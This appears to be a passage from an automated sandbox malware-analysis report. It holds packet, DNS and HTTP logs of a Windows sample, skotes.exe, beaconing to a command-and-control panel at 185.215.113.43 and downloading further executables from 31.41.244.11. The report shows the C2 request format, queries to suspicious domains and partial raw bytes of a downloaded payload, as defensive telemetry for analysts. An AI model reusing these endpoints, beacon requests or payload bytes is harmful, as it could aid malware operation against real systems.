                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.682691097 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.682796955 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.682910919 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.684139967 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.685415030 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.685524940 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.685836077 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.685877085 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.686064005 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.686521053 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.686527967 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.686618090 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.686789036 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.687653065 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.687757015 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.692004919 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.692061901 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.692071915 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.692209959 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.692222118 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.693245888 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.693384886 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.693495035 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.694766045 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.695926905 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.695926905 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.696238995 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.696238995 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.736339092 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.736469984 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.736494064 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.736514091 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.736799002 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.736881018 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.738249063 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.738287926 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.738315105 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.738342047 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.739207983 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.739255905 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.739415884 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.739459038 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.774867058 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.774885893 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.775327921 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.775752068 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.775764942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.776654959 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.776916027 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.776921988 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.776978970 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.776978970 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.777132034 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.777194977 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.777357101 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.778266907 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.778408051 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.815290928 CET8049848185.215.113.206192.168.2.4

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:13.215657949 CET192.168.2.41.1.1.10x4815Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.446603060 CET192.168.2.41.1.1.10xf0bfStandard query (0)zonedw.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.123735905 CET192.168.2.41.1.1.10xe0c6Standard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.287858009 CET192.168.2.41.1.1.10x4eadStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:56.017075062 CET192.168.2.41.1.1.10x66adStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:56.017301083 CET192.168.2.41.1.1.10xe2d4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:26.819611073 CET192.168.2.41.1.1.10x7d2eStandard query (0)fightlsoser.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:29.829040051 CET192.168.2.41.1.1.10xece1Standard query (0)drive-connect.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:32.793324947 CET192.168.2.41.1.1.10xd4a8Standard query (0)iplogger.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:31.139148951 CET192.168.2.41.1.1.10xbbdfStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:43.339550972 CET192.168.2.41.1.1.10x6c7Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:53.007744074 CET192.168.2.41.1.1.10xd781Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:53.007853985 CET192.168.2.41.1.1.10x8048Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:13.352824926 CET1.1.1.1192.168.2.40x4815No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.755686045 CET1.1.1.1192.168.2.40xf0bfNo error (0)zonedw.sbs116.203.10.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.071362972 CET1.1.1.1192.168.2.40xe9b9No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.261905909 CET1.1.1.1192.168.2.40xe0c6No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:56.155555964 CET1.1.1.1192.168.2.40x66adNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:56.155581951 CET1.1.1.1192.168.2.40xe2d4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:27.145757914 CET1.1.1.1192.168.2.40x7d2eNo error (0)fightlsoser.click104.21.35.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:27.145757914 CET1.1.1.1192.168.2.40x7d2eNo error (0)fightlsoser.click172.67.213.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:30.155579090 CET1.1.1.1192.168.2.40xece1No error (0)drive-connect.cyou172.67.139.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:30.155579090 CET1.1.1.1192.168.2.40xece1No error (0)drive-connect.cyou104.21.79.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:33.098685980 CET1.1.1.1192.168.2.40xd4a8No error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:33.098685980 CET1.1.1.1192.168.2.40xd4a8No error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:31.276324987 CET1.1.1.1192.168.2.40xbbdfNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:53.152719975 CET1.1.1.1192.168.2.40xd781No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:53.155889988 CET1.1.1.1192.168.2.40x8048No error (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.449736185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:04.755903006 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:06.118244886 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.449738185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.752580881 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.125693083 CET1080INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 33 37 39 0d 0a 20 3c 63 3e 31 30 31 34 37 39 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 65 37 31 39 31 34 65 35 34 61 36 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 31 30 31 34 37 39 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 33 37 61 39 65 34 64 31 35 65 66 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 34 37 39 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 34 37 39 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: 379 <c>1014790001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#1014791001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc37a9e4d15ef02ab5e45425197d1aa1daaa8#1014792001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1014793001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1014794001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1014795001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1014796001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1014797001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1014798001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c27c7111eeb00b11a100301a2f8b13be1a49a5536e6#<d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.44974531.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.253762960 CET61OUTGET /files/encoxx/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581240892 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:10 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 393728
                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675a96d4-60200"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581295013 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05
                                                                                                                                                                                                                                                Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvllllllll
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581310987 CET448INData Raw: 69 6b 65 6c 79 20 74 68 65 20 72 65 73 75 6c 74 20 6f 66 20 63 61 6c 6c 69 6e 67 20 61 6e 20 4d 53 49 4c 2d 63 6f 6d 70 69 6c 65 64 20 28 2f 63 6c 72 29 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f 6e 73 74 72 75
                                                                                                                                                                                                                                                Data Ascii: ikely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in y
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581329107 CET1236INData Raw: 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 5f 6f 6e 65 78 69 74 2f 61 74 65 78 69
                                                                                                                                                                                                                                                Data Ascii: 6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581419945 CET1236INData Raw: 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 40 e6 45 00 98 e6 45
                                                                                                                                                                                                                                                Data Ascii: InformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLL@EEe+000~PAGAIsProcessorFeaturePresentKERNEL32_nextafter_logb_yn_y1_y0frexpfmod_hypot_cabsldexpmodffabs
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581437111 CET448INData Raw: 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 01 81 01 81 01 81 01 81 01 81 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                                                                                                                                                                                Data Ascii: H
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581470013 CET1236INData Raw: 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee
                                                                                                                                                                                                                                                Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581486940 CET1236INData Raw: 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00
                                                                                                                                                                                                                                                Data Ascii: '`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vec
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581620932 CET1236INData Raw: 00 00 00 60 2b 40 00 58 2b 40 00 4c 2b 40 00 40 2b 40 00 34 2b 40 00 28 2b 40 00 1c 2b 40 00 14 2b 40 00 08 2b 40 00 fc 2a 40 00 aa 1a 40 00 40 26 40 00 24 26 40 00 10 26 40 00 f0 25 40 00 d4 25 40 00 f4 2a 40 00 ec 2a 40 00 a8 1a 40 00 e8 2a 40
                                                                                                                                                                                                                                                Data Ascii: `+@X+@L+@@+@4+@(+@+@+@+@*@@@&@$&@&@%@%@*@*@@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@|*@x*@t*@p*@l*@h*@d*@`*@\*@X*@T*@P*@L*@@*@4*@,*@
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581638098 CET672INData Raw: 8b ec b8 f8 15 00 00 e8 c3 ce 00 00 8b 45 08 8b 08 8b 50 04 a1 18 94 45 00 53 56 89 4d f4 8b 0d 1c 94 45 00 89 45 d4 57 8d 45 ec 89 55 e8 c7 45 ec 00 00 00 00 89 4d e0 e8 b2 ff ff ff 81 45 ec 3f 02 00 00 83 3d ec 0b 46 00 14 75 11 6a 00 6a 00 8d
                                                                                                                                                                                                                                                Data Ascii: EPESVMEEWEUEME?=FujjRL@ E$E=4@@EME EEuFu=uF@.=ujj@xFUEEEUU3=FF
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.701258898 CET1236INData Raw: 00 6a 00 ff 15 98 10 40 00 56 e8 50 fd ff ff 83 c6 08 83 6d fc 01 75 b1 5f 5e 5b 8b e5 5d c3 51 68 70 ea 45 00 e8 15 15 00 00 83 c4 08 c3 cc 55 8b ec 64 a1 00 00 00 00 6a ff 68 28 61 45 00 50 b8 34 10 00 00 64 89 25 00 00 00 00 e8 de cb 00 00 53
                                                                                                                                                                                                                                                Data Ascii: j@VPmu_^[]QhpEUdjh(aEP4d%SVW=t@33l@SN~F?|=FSPSX@SSS8@SSSMQSSS@3E]fUSS](SSSSSSQ


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.449757185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:13.908497095 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014790001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.264832020 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.44976331.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.410218954 CET62OUTGET /files/hell911/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734319925 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:16 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 2660864
                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675b72d4-289a00"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
